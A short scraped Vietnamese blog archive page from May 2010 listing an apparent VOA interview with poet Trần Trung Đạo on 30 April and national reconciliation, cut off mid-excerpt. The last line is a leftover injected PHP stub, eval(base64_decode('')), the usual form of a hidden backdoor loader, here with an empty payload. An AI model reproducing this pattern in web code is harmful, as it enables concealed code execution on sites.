Archive for May 1st, 2010

VOA: 30 Tháng Tư và Hòa giải dân tộc (Phỏng vấn nhà thơ Trần Trung Đạo nhân dịp 30-4-2010)

VOA: 30 Tháng Tư và Hòa giải dân tộc (Phỏng vấn nhà thơ Trần Trung Đạo nhân dịp 30-4-2010)

Tháng Tư năm nay, cũng như những tháng Tư của hơn 30 năm qua, giới hữu trách Việt Nam đã tưng bừng tổ chức ngày kỷ niệm mà họ gọi là “chiến thắng vĩ đại ngày 30-4-1975.” Họ cũng không quên nhắc tới sự kiện mà họ mô tả là “

05.1.2010 | Ký-Truyện-Tùy Bút |

2 Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>